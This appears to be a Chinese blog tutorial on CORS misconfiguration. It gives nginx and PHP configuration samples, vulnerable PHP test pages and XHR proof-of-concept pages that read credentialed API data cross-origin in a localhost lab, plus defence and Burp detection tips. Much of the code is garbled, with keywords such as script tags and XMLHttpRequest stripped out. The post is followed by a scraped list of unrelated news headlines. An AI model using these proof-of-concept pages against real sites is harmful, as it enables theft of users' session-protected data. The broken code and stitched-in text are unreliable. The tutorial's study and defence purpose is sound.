【干货分享】浅析CORS攻击及其挖洞思路
我对于CORS配置不当漏洞的认识一直处于比较模糊的状态,不是很清楚如何判定存在这个漏洞,如何去利用这个漏洞造成危害。这类型的漏洞在SRC中一般是中危的,非常适合拿来刷排名,所以笔者这里以此进行了一番研究和总结。
0x1 CORS机制
CORS全名跨域资源共享(Cross-Origin-Resourece-sharing),该机制主要是解决浏览器同源策略所带来的不便,使不同域的应用能够无视同源策略,进行信息传递。
引用一张图能很好地说明CORS机制的作用
0x2 CORS机制实现
那么这个机制是怎么发挥作用的呢?
CORS的标准定义是:通过设置http头部字段,让客户端有资格跨域访问资源。通过服务器的验证和授权之后,浏览器有责任支持这些http头部字段并且确保能够正确的施加限制。
为了更好理解这个过程,我们首先了解下相关的http头部字段
那么这个机制,具体可以总结为下面这个图片
所有的请求实际上都已经发出了,只不过浏览器解析的时候根据返回的http头部字段来选择性拦截了而已。
0x3 如何配置CORS
3.1 配置中间件nginx实现CORS跨域
这个点我就从网上经典的例子来找的,其实默认这样设置存在很多问题,0x4的时候我会讲相应的攻击思路
我当时google了一下搜索nginx配置跨域CORS)
经典配置一:
1location/ {
2add_headerAccess-Control-Allow-Origin *;
3add_headerAccess-Control-Allow-Methods 'GET, POST, OPTIONS';
4add_headerAccess-Control-Allow-Headers 'DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization';
5
6if( $request_method= 'OPTIONS') {
7return204;
8}
9}
经典配置二:
1location/ {
2add_headerAccess-Control-Allow-Origin $http_origin;
3add_headerAccess-Control-Allow-Methods GET,POST,OPTIONS;
4add_headerAccess-Control-Allow-Credentials true;
5add_headerAccess-Control-Allow-Headers DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type;
6add_headerAccess-Control-Max-Age 1728000;
7}
比较合理的配置方案(加上白名单检查):
1location/ {
2# 检查域名后缀 这里进行了检查
3if( $http_origin~ .test.com){
4add_headerAccess-Control-Allow-Origin $http_origin;
5add_headerAccess-Control-Allow-Methods GET,POST,OPTIONS;
6add_headerAccess-Control-Allow-Credentials true;
7add_headerAccess-Control-Allow-Headers DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type;
8add_headerAccess-Control-Max-Age 1728000;
9}
10# options请求不转给后端,直接返回204
11}
3.2 单服务PHP简单控制头部方式
当年某一个SSRF的漏洞,我就是天真的没有设置跨域请求,不熟悉,导致丢失了一血,非常遗憾哇。
1.允许所有源
1<?php
2header( "Access-Control-Allow-Origin: *");
3?>
2.允许来自特定源的访问
1<?php
2header( 'Access-Control-Allow-Origin: '.$_SERVER[ 'HTTP_ORIGIN']);
3?>
3.配置多个访问源
1<?php
2$allowed_origins = array(
3"http://www.example.com",
4"http://app.example.com",
5"http://cms.example.com",
6);
7if(in_array($_SERVER[ 'HTTP_ORIGIN'], $allowed_origins)){
8@header( "Access-Control-Allow-Origin: ". $_SERVER[ 'HTTP_ORIGIN']);
9}
10?>
还有相当多的方式,具体可以参考Nginx 通过 CORS 实现跨域
0x4 攻击CORS的思路
4.1 一次失败的例子
这里我自己写一个简单的存在CORS漏洞的服务为例子展示如何对此进行攻击(其实没办法攻击)。
1<?php
2header( "Access-Control-Allow-Origin: *");
3$value = "mySecretIs123456";
4setcookie( "pass",$value, time+ 3600* 24);
5?>
6<!DOCTYPE html>
7< html>
8< head>
9< >
10window. = function{
11document.body.innerHTML = document.cookie;
12}
13</ >
14</ head>
15< body>
16</ body>
17</ html>
可以看到我们直接把cookie回显给了页面,当时我挖掘腾讯的时候就遇到这样的一个例子
但是没想着怎么去利用,然后给忽略了,不过当时好像也没开cors配置,毕竟是个test站点。
回到正题上,我们该怎么对此进行攻击呢。
这里我们编辑下/etc/hosts,增加两条解析记录
1127 .0.0.1victim.com
226 127 .0.0.1attack.com
exp.php:
1< html>
2< head>
3< type= "text/java">
4window. = functioncors{
5varxhttp = new;
6xhttp.onreadystatechange = function{
7if( this.readyState == 4&& this.status == 200) {
8document.getElementById( "demo").innerHTML =
9alert( this.responseText);
10}
11};
12xhttp.open( "GET", "http://victim.com:8888/cors/vuln.php", true);
13xhttp.send;
14}
15
16</ >
17</ head>
18< body>
19< textareaid= "demo"> </ textarea>
20</ body>
21</ html>
然后我们假装受害者去访问下:
结果返回的是html的源代码,没办法获取dom之后的结果,这其实也在我的意料之中因为浏览器不会去解析资源内容再返回,欢迎师傅们谈下这类型的信息泄漏有啥利用的思路。
0x4.2 API接口信息获取
这里分为两种情况:
第一种是无需cookie的,这种一般可以利用在比如限制了ip的waf,让管理员去请求敏感页面获取相应资源。
漏洞代码如下:
apiVuln.php
1<?php
2header( "Access-Control-Allow-Origin: *");
3header( "content-type:application/json");
4$info = array( 'user'=> 'xq17', 'pass'=> '123456');
5echojson_encode($info); //json_encode对变量进行 JSON 编码
6
攻击代码如下:
1< html>
2< head>
3< type= "text/java">
4window. = functioncors{
5varxhttp = new;
6xhttp.onreadystatechange = function{
7if( this.readyState == 4&& this.status == 200) {
8document.getElementById( "demo").innerHTML =
9alert( this.responseText);
10}
11};
12xhttp.open( "GET", "http://victim.com:8888/cors/apiVuln.php", true);
13xhttp.send;
14}
15
16</ >
17</ head>
18< body>
19< textareaid= "demo"> </ textarea>
20</ body>
21</ html>
第二种是发送cookie利用登陆信息,然后请求鉴权的api获取敏感数据。
vuln.php
1<?php
2header( "Access-Control-Allow-Origin: *");
3session_start;
4
5if(@$_SESSION[ "user"] == "admin"){
6//输出敏感信息
7$info = array( 'user'=> 'xq17', 'pass'=> '123456');
8echojson_encode($info);
9} else
10{
11echo"login fail!";
12echo'<a href="login.php">登陆</a>';
13}
14?>
login.php
1<?php
2session_start;
3$_SESSION[ "user"]= "admin";
4header( "Location:vuln.php");
5
这里我们准备下两个页面,当我们尝试利用这样的poc来攻击的话
1< html>
2< head>
3< type= "text/java">
4window. = functioncors{
5varxhttp = new;
6xhttp.onreadystatechange = function{
7if( this.readyState == 4&& this.status == 200) {
8document.getElementById( "demo").innerHTML =
9alert( this.responseText);
10}
11};
12xhttp.open( "GET", "http://victim.com:8888/cors/vuln.php", true);
13xhttp.withCredentials = false;
14xhttp.send;
15}
16
17</ >
18</ head>
19< body>
20< textareaid= "demo"> </ textarea>
21</ body>
22</ html>
我们访问 http://victim.com:8888/cors/vuln.php,然后点击登陆获取到登陆信息,然后我们假装成受害者点击`http://attack.com:8888/cors/exp.php`
可以看到这个接口是需要登陆信息的
但是如果我们修改vuln.php成这样子呢
1header( "Access-Control-Allow-Origin: *");
2header( "Access-Control-Allow-Credentials: true");
可以看到cookie的确发送了,也返回了对应的json数据,但是却没有被脚本接收到,因为脚本接收到数据得先问下浏览器支持不,我们可以看下console就可以发现被禁止的原因了,因为
1header( "Access-Control-Allow-Origin: *");
2header( "Access-Control-Allow-Credentials: true");
这样开启的跨域肯定是不安全的,所以浏览器直接ban掉了这种配置方式。
这样也是不行的,我们再尝试修改成:
1header( "Access-Control-Allow-Origin: http://attack.com:8888");
2header( "Access-Control-Allow-Credentials: true");
这样便可以了获取到敏感信息了。
最后小结一下:
关键判断是否存在cors漏洞
公有资源:Access-Control-Allow-Origin:*
授权信息:Access-Control-Allow-Credentials: true 同时 Access-Control-Allow-Origin:不为*
0x5 CORS防御思路
白名单
规范化正则表达式
只允许安全的协议如https
避免使用Access-Control-Allow-Credentials为True
使用框架的时候注意查看相关文档的用法,根据上面规则进行更正。
0x6 高效挖掘CORS漏洞的探讨
如何有效的探测cors漏洞呢,最简单的就是我们伪造一个xhr的请求去测试下能获取信息不,xhr请求有一个很明显的特征字段:Origin,这个也是浏览器判断是否同源的根据。
burp是支持简单的cors漏洞扫描的
但是误报率很高,而且也需要自己去手工验证,这里我比较推荐
就是我们自己寻找一些关键的api接口,然后我们让请求自动添加上Origin然后我们在看返回包,来判断这样的话不但准确而且很方面。
这个实现我们可以用burp的替换功能来实现
1proxy->options->Match and Replace->Add
勾选上这个即可。
0x7 总结
关于cors的攻击点其实不是很多,我感觉还是这种错误配置最典型,至于那些正则匹配失误的情况,平时可以多加留意,欢迎师傅能介绍一些怎么让burp去自动fuzz正则错误的情况,这个其实可以用burp插件解决,但是我没有找到,如果有师傅知道可以告诉下我,我就不重复造轮子了,不然到时候我就自己写一个然后实战记录下。
关于一些错误配置的例子可以参考错误配置CORS的3种利用方法
参考链接
cors安全完全指南<https://xz.aliyun.com/t/2745>
HTTP访问控制(CORS)<https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Access_control_CORS#Preflighted_requests>
来源:xq17
基础教程
责任编辑:
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 恒基李家杰 顺丰王卫及谷歌前CTO助阵!格兰仕“中国芯”轰动业界
原标题:恒基李家杰 顺丰王卫及谷歌前CTO助阵!格兰仕“中国芯”轰动业界香港恒基兆业地产有限公司联席主席兼总经理、香港中华煤气有限公司联席主席李家杰、顺丰速运集团总裁王卫、谷歌前首席技术官Aglaia Kong(硅谷传奇科学家),代表着顶级的资本、物流及最新科学技术,任意一…...
2024/4/30 18:06:29 - 信通院:2月国内手机出货量638.4万部 同比下降56%
原标题:信通院:2月国内手机出货量638.4万部 同比下降56%3月9日下午消息,中国信通院数据显示,2020年2月,国内手机市场总体出货量638.4万部,同比下降56.0%,其中4G手机396.0万部、5G手机238.0万部。 数据显示,2020年1-2月,国内手机市场总体出货量2719.7万部,同比下降…...
2024/4/1 15:51:57 - 只“鼠”于你的除夕祝福已到,请签收!
原标题:只“鼠”于你的除夕祝福已到,请签收!除夕的N种迎接方式! 改革春风吹满地, 新的一年要争气! 今⛅天 是旧的一年的终点, 也是新的一年的起点。 吃货式:🍉年夜饭来了 跨年之际,我想很多人最想做的一件事肯定是 一家团圆了。一家人围成一桌,吃团圆饭,这是…...
2024/4/30 18:04:54 - 8882米:亚洲陆上第一深井在塔里木诞生
原标题:8882米:亚洲陆上第一深井在塔里木诞生日前从中国石油塔里木油田获悉,截至7月19日,中国石油重点风险探井轮探1井钻至8882米后转入钻井完井阶段。这口井刷新亚洲陆上最深井纪录,刷新亚洲陆上8877米最深测井纪录,刷新亚洲陆上8641—8649.5米井段最深取芯纪录。 轮探…...
2024/3/22 10:30:48 - 【运行调控】基于动态溢流风险的排水系统实时控制
原标题:【运行调控】基于动态溢流风险的排水系统实时控制原 文 信 息 原文题目:A generalised Dynamic Overflow Risk Assessment (DORA) for Real Time Control of urban drainage systems 作者:Luca Vezzaro, Morten Grum 作者单位:Krger A/S, Veolia Water Techn…...
2024/4/17 2:06:08 - 微软/腾讯/网易/头条/美团/BIGO等企业的内推机会
原标题:微软/腾讯/网易/头条/美团/BIGO等企业的内推机会最近兼职做了点公司里HR的工作,给公司搜集内推了不少简历,从2019/01/28推荐第一份简历开始,到昨天2019/05/18,目前总共推荐了185位候选人,如果算上还在冻结期内无法提交的简历,有213份。 每份简历我都仔细看过,并…...
2024/4/30 13:48:02 - 《博物》| 你快看,这家伙居然吃自己的屎......
原标题:《博物》| 你快看,这家伙居然吃自己的屎......大家好,我是今天的主角(不是) 撰文 | 何长欢 部分图片来自 | 123rf.com.cn 责编 | 许嘉芩 刘愈 最近几年,时不时地就会有动物在网络上蹿红,比如吃饭特费劲的鲸头鹳 (上图),再比如永远保持微笑的短尾矮袋鼠等等。…...
2024/4/30 17:51:16 - 通知:野狗将于6月20日开始关闭服务
原标题:通知:野狗将于6月20日开始关闭服务在去年3月宣布暂停注册之后,野狗的服务坚持运行了一年多的时间。期间因为没有固定的运维人员,出了好几次事故。 野狗对于我来说就像是自己的孩子,下决心关闭服务是个很艰难的决定。但正如人生不能总是留恋在过去,得活在当下和未…...
2024/4/30 16:58:23 - 公众号迁移声明
原标题:公众号迁移声明小牛拜师-职业新人教练 先行谢过伙伴们的持续关注,我们将加倍努力不辜负! 责任编辑:...
2024/4/16 11:43:51 - 关于新冠肺炎,日本小学校长发了一封三观正确的家长信
原标题:关于新冠肺炎,日本小学校长发了一封三观正确的家长信截止到2月2日零时,日本共确诊20例新型冠状病毒感染肺炎患者。随着新型肺炎确诊人数的增多,日本社会开始出现不安,各地口罩也都基本上架即空。同时,针对中国人的歧视、诽谤、谣言也开始增多。 日本厚生劳动省承…...
2024/3/22 10:30:42 - 众志成城,共同抗疫,深圳市物联网产业协会在行动
原标题:众志成城,共同抗疫,深圳市物联网产业协会在行动本文作者: 短颈鹿先生 2020年1月23日以来,深圳市物联网产业协在新型冠状病毒(2019-nCoV)疫情防控期间,认真贯彻落实习近平总书记关于疫情防控的系列重要指示精神,按照党中央、国务院关于疫情防控工作部署要求,通…...
2024/5/1 0:05:08 - 华北电力大学能源互联网研究中心2020招聘启事
原标题:华北电力大学能源互联网研究中心2020招聘启事华北电力大学能源互联网研究中心简介 华北电力大学能源互联网研究中心于2015年10月31日成立。华北电力大学能源互联网研究中心整合校内外能源领域的优势科研力量,形成由经济管理、电气与电子、能源与动力、可再生能源、信…...
2024/4/30 18:31:08 - 反思 | 从城市大脑到基层系统,智慧城市是否需要重新定义?
原标题:反思 | 从城市大脑到基层系统,智慧城市是否需要重新定义?来源丨智能相对论 如果说过去“智慧城市”的重点仍放在顶层设计架构,那么在此次防疫工作的紧急需求下,这一项目便不得不以另一种更快的方式下沉,落实到城市各个角落的社区、街道等细分单元格内,呈现为“大…...
2024/3/22 10:30:38 - 天津市出台寄递企业安全中心建设与管理规范地方标准
原标题:天津市出台寄递企业安全中心建设与管理规范地方标准近日,天津市市场监管委正式批准发布由市邮政管理局指导、市邮政业安全中心牵头起草的《寄递企业安全中心建设与管理规范》地方标准,自2020年1月18日起实施。这是 全国首个省级寄递企业安全中心建设地方标准。 出台…...
2024/3/8 14:20:43 - 在岸人民币跌破6.84创逾七年新低
原标题:在岸人民币跌破6.84创逾七年新低导读:人民币跌跌不休,海外资产配置刻不容缓 人民币跌破6.84 今日,美元指数强势上扬,已突破100关口,为去年12月以来最高。人民币兑美元大跌,在岸人民币兑美元收盘跌破6.84,创逾七年新低,离岸人民币跌破6.85关口。 在岸人民币兑美…...
2024/4/19 2:28:31 - 《未来简史》你不知道的人类
原标题:《未来简史》你不知道的人类中国特别缺像尤瓦尔赫拉利这样的作家,跨学科,观念新颖,语言和资料的使用也非常好。他的新书《未来简史》总体来说,是一本优秀的作品,但整体的思想,包括一些推论,我觉得更多的是偏悲观了。 自私的基因,无私的人性 尤瓦尔赫拉利在书…...
2024/4/26 21:00:12 - 京东到家订单查询服务演进
原标题:京东到家订单查询服务演进背景: 京东到家订单中心系统业务中,无论是外部商家的订单生产,或是内部上下游系统的依赖,订单查询的调用量都非常大,造成了订单数据读多写少的情况。京东到家的订单数据存储在Mysql中,但显然只通过DB来支撑大量的查询是不可取的,同时对…...
2024/4/1 22:59:33 - 日企来华订口罩生产线,中石化熔喷布生产线已就位!
原标题:日企来华订口罩生产线,中石化熔喷布生产线已就位!来源:金属加工整理,素材来自央视财经、煤化工网、东方医疗器械网、回形针等 随着新冠肺炎疫情全球爆发,全球对口罩的需求量加大,于是有了3月2日,马云公益基金会通过社交平台宣布向日本捐赠100万只口罩,用于支援…...
2024/3/22 10:30:36 - 40家通航企业为疫情防控出动935架航空器
原标题:40家通航企业为疫情防控出动935架航空器截至3月6日,全国共有140家通用航空企业使用935架航空器执行了323次疫情防控任务,累计飞行2238.99小时6869架次,运送相关人员62人次,运送各类药品和物资87.1385吨;开展航空喷洒作业3148次,执行空中巡查任务903次,执行空中拍…...
2024/3/22 10:30:34 - 清明节放假通知【厦门易钱商软件开发有限公司】
原标题:清明节放假通知【厦门易钱商软件开发有限公司】四月者,送严寒而迎东君,历清明而过谷雨。金风和煦,万物复苏。百芳发而幽香逸,春鸟还而鸣声碎。 清明节,又称踏青节、行清节、三月节、祭祖节,节期在仲春与暮春之交。清明兼具自然与人文两大内涵,既是自然节气点,…...
2024/3/22 10:30:34
最新文章
- Hotcoin Research|玩赚WEB3:Seraph零成本赚取技巧
在《Seraph》这款游戏里,要提升自己的游戏技能和体验,了解如何免费赚取游戏货币灵魂晶石并挑战游戏主线是非常重要的。你可以通过卖东西、参加虚空异界地图和混沌秘境来在游戏里赚更多的钱,并更享受游戏的乐趣。最酷的是,得到的灵…...
2024/5/1 1:10:39 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - 01背包问题 小明的背包
2.小明的背包1 - 蓝桥云课 (lanqiao.cn) #include <bits/stdc.h> using namespace std; const int N1010;//开始写的105 开小了 样例过了但最后只过了很少一部分 int n,m; int v[N],w[N]; int f[N][N];int main() {cin>>n>>m;for(int i1;i<n;i){cin>&…...
2024/4/30 7:25:11 - Android Framework学习笔记(2)----系统启动
Android系统的启动流程 启动过程中,用户可控部分是framework的init流程。init是系统中的第一个进程,其它进程都是它的子进程。 启动逻辑源码参照:system/core/init/main.cpp 关键调用顺序:main->FirstStageMain->SetupSel…...
2024/4/30 17:19:30 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/4/29 23:16:47 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/4/30 18:14:14 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/4/29 2:29:43 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/4/30 18:21:48 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/4/27 17:58:04 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/4/27 14:22:49 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/4/28 1:28:33 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/4/30 9:43:09 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/4/27 17:59:30 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/4/25 18:39:16 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/4/28 1:34:08 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/4/26 19:03:37 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/4/29 20:46:55 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/4/30 22:21:04 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/4/26 23:04:58 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/4/27 23:24:42 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/4/28 5:48:52 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/4/30 9:42:22 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/4/30 9:43:22 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/4/30 9:42:49 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
